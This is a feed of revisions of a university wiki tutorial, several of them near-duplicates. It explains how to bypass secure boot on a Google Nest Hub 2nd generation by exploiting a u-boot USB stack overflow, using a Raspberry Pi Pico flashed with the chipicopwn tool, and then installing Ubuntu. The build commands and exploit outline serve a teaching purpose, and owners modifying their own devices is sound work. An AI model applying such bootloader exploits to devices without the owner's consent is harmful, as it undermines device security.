 sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
 cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
 export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 sudo cmake ..&lt;br /&gt;
 sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
[[File:HardwareCabled.png|500px|thumb|right|Verkabelte Hardware]]&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
=== Result ===&lt;br /&gt;
[[File:Demonstration.png|500px|thumb|Demonstration]]&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14101</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14101"/>
		<updated>2024-01-27T15:23:24Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update, now the booting sequence of the Recovery Mode does not work as intended for this exploit to work. &lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation --&amp;gt; [[Nest_Hub_2nd_Generation]]&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
sudo apt install git&lt;br /&gt;
sudo apt install openocd&lt;br /&gt;
sudo apt install gcc-multilib&lt;br /&gt;
sudo apt install build-essential&lt;br /&gt;
sudo apt install python3-serial&lt;br /&gt;
sudo apt install libudev-dev&lt;br /&gt;
sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
mkdir pico&lt;br /&gt;
cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
cd pico-sdk&lt;br /&gt;
git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
&lt;br /&gt;
cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
mkdir build&lt;br /&gt;
cd build&lt;br /&gt;
sudo cmake ..&lt;br /&gt;
sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
[[File:HardwareCabled.png|500px|thumb|right|Verkabelte Hardware]]&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
=== Result ===&lt;br /&gt;
[[File:Demonstration.png|500px|thumb|Demonstration]]&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Demonstration.png&amp;diff=14100</id>
		<title>File:Demonstration.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Demonstration.png&amp;diff=14100"/>
		<updated>2024-01-27T15:21:16Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: Successful install of Ubuntu on a Nest Hub.
Taken from https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
Successful install of Ubuntu on a Nest Hub.&lt;br /&gt;
Taken from https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:HardwareCabled.png&amp;diff=14099</id>
		<title>File:HardwareCabled.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:HardwareCabled.png&amp;diff=14099"/>
		<updated>2024-01-27T15:19:18Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: Verkabeltes Google Nest Hub 2GEN für den USB Exploit&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
Verkabeltes Google Nest Hub 2GEN für den USB Exploit&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14098</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14098"/>
		<updated>2024-01-27T15:15:58Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update, now the booting sequence of the Recovery Mode does not work as intended for this exploit to work. &lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation --&amp;gt; [[Nest_Hub_2nd_Generation]]&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
sudo apt install git&lt;br /&gt;
sudo apt install openocd&lt;br /&gt;
sudo apt install gcc-multilib&lt;br /&gt;
sudo apt install build-essential&lt;br /&gt;
sudo apt install python3-serial&lt;br /&gt;
sudo apt install libudev-dev&lt;br /&gt;
sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
mkdir pico&lt;br /&gt;
cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
cd pico-sdk&lt;br /&gt;
git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
&lt;br /&gt;
cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
mkdir build&lt;br /&gt;
cd build&lt;br /&gt;
sudo cmake ..&lt;br /&gt;
sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14097</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14097"/>
		<updated>2024-01-27T15:15:01Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: v1.0, work in progress&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update, now the booting sequence of the Recovery Mode does not work as intended for this exploit to work. &lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
We want to change the OS of a Google Nest Hub 2. Generation by exploiting a vulnerability in the bootloader u-boot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* 1x Google Nest Hub, 2nd Generation&lt;br /&gt;
* 1x Raspberry Pi Pico&lt;br /&gt;
* 1x Powered Micro-USB Hub (NestUSB does not provide power)&lt;br /&gt;
* 2x Micro-USB cables&lt;br /&gt;
* 1x UART to USB&lt;br /&gt;
* 1x bootable USB Stick with Ubuntu 22.04 and the files from https://github.com/frederic/elaine-bootimg (Elaine bootimg gives privilege to use the Nest touchscreen for the Linux OS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Flash an USB stick with Ubuntu 22.04, if you haven&#039;t done earlier.&lt;br /&gt;
&lt;br /&gt;
[[File:01_rufus_for_bootUSB.jpeg|500px|thumb|right|rufusflash]]&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
In order to be compatible with the touchscreen of the nest, we need to adjust some files in partition system boot.&lt;br /&gt;
&lt;br /&gt;
Copy the following files from the repository https://github.com/frederic/elaine-bootimg in partition system-boot :&lt;br /&gt;
* u-boot-elaine.bin : U-Boot image for elaine&lt;br /&gt;
* u-boot-elaine.cmd : U-Boot environment file&lt;br /&gt;
* boot.img : Boot image (Kernel for elaine, DTB, initrd)&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
The exploit is made possible because there is a stack overflow within the bootloader u-Boot, which happens with block sizes greater than 512 bytes. Most USB-Sticks only support 512 Bytes. The solution is taking a suitable microcontroller, in our case a Raspberry Pico, which is equipped with TinyUSB, which provides a Mass Storage device example code that can turn a Raspberry Pi Pico into a customizable USB flash drive.&lt;br /&gt;
This Pico will be used to inject arbitrary payload into the stack memory and overwrite return address to execute the payload.&lt;br /&gt;
However, the storage of the pico is very limited, hence we will have to hotswap the pico with our USB Stick, which contains all neccessary data to install the OS.&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
For the Pico we will have to prepare the following:&lt;br /&gt;
&lt;br /&gt;
1. Install dependencies&lt;br /&gt;
Update the system:&lt;br /&gt;
sudo apt-get update&lt;br /&gt;
&lt;br /&gt;
Install dependencies:&lt;br /&gt;
sudo apt install git&lt;br /&gt;
sudo apt install openocd&lt;br /&gt;
sudo apt install gcc-multilib&lt;br /&gt;
sudo apt install build-essential&lt;br /&gt;
sudo apt install python3-serial&lt;br /&gt;
sudo apt install libudev-dev&lt;br /&gt;
sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi build-essential &lt;br /&gt;
sudo apt install libstdc++-arm-none-eabi-newlib&lt;br /&gt;
&lt;br /&gt;
Create workspace, current location /home/&lt;br /&gt;
mkdir pico&lt;br /&gt;
cd pico&lt;br /&gt;
&lt;br /&gt;
Clone pico-sdk and update it, current location /home/pico/&lt;br /&gt;
git clone https://github.com/raspberrypi/pico-sdk.git --branch master&lt;br /&gt;
cd pico-sdk&lt;br /&gt;
git submodule update --init&lt;br /&gt;
&lt;br /&gt;
In the Pico folder we do clone our chipicopwn, current location /home/pico/&lt;br /&gt;
&lt;br /&gt;
sudo git clone https://github.com/frederic/chipicopwn chipicopwn&lt;br /&gt;
&lt;br /&gt;
cd chipicopwn&lt;br /&gt;
&lt;br /&gt;
Now we need the commands from the repository:&lt;br /&gt;
Set the Path to wherever you saved your pico-sdk repository&lt;br /&gt;
export PICO_SDK_PATH=/home/user/pico/pico-sdk/&lt;br /&gt;
&lt;br /&gt;
!! If you have this in the home directory do not use relative paths, since this command is executed as root!&lt;br /&gt;
&lt;br /&gt;
Flashing the program, current location /home/pico/chipicopwn&lt;br /&gt;
It may be that a build folder already exists. It is recommended to delete it and make a new one, since some files may or may not work / flash as intended.&lt;br /&gt;
&lt;br /&gt;
mkdir build&lt;br /&gt;
cd build&lt;br /&gt;
sudo cmake ..&lt;br /&gt;
sudo make&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now the project should be built.&lt;br /&gt;
Now we need to boot the Pico in bootloader mode (by holding down the BOOTSEL button) and get the chipicopwn.uf2 on the pico device itself by copying it.&lt;br /&gt;
&lt;br /&gt;
Now we should have two hardware components prepared:&lt;br /&gt;
&lt;br /&gt;
The USB Stick with the Ubuntu Image optimized for touchscreen and the Raspberry Pico with the modified bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 ===&lt;br /&gt;
&lt;br /&gt;
Remove the lid underneath the Nest Hub base to expose USB port&lt;br /&gt;
Connect the Raspberry Pico to Nest Hub (through powered-hub or Y-cable because the USB port does not provide power)&lt;br /&gt;
Hold Volume Down + Volume Up + Mute buttons while powering on the Nest Hub&lt;br /&gt;
Once CHIPICOPWN logo appears on screen, replace the Raspberry Pico with USB flash drive&lt;br /&gt;
&lt;br /&gt;
Now you can install Ubuntu on your Google Nest.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Nest_Hub_2nd_Generation]]&lt;br /&gt;
[[Raspberry Pi Pico]]&lt;br /&gt;
[[Powered Micro-USB Hub]]&lt;br /&gt;
[[Micro-USB cable]]&lt;br /&gt;
optional for log insight: [[UART to USB Adapter]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[WFP2]] (2023)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html&lt;br /&gt;
* https://github.com/frederic/chipicopwn&lt;br /&gt;
* https://github.com/frederic/elaine-bootimg&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:01_rufus_for_bootUSB.jpeg&amp;diff=14092</id>
		<title>File:01 rufus for bootUSB.jpeg</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:01_rufus_for_bootUSB.jpeg&amp;diff=14092"/>
		<updated>2024-01-27T14:19:53Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: An USB Stick is being flashed with Ubuntu 22.04 over the Program Rufus.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
An USB Stick is being flashed with Ubuntu 22.04 over the Program Rufus.&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
</feed>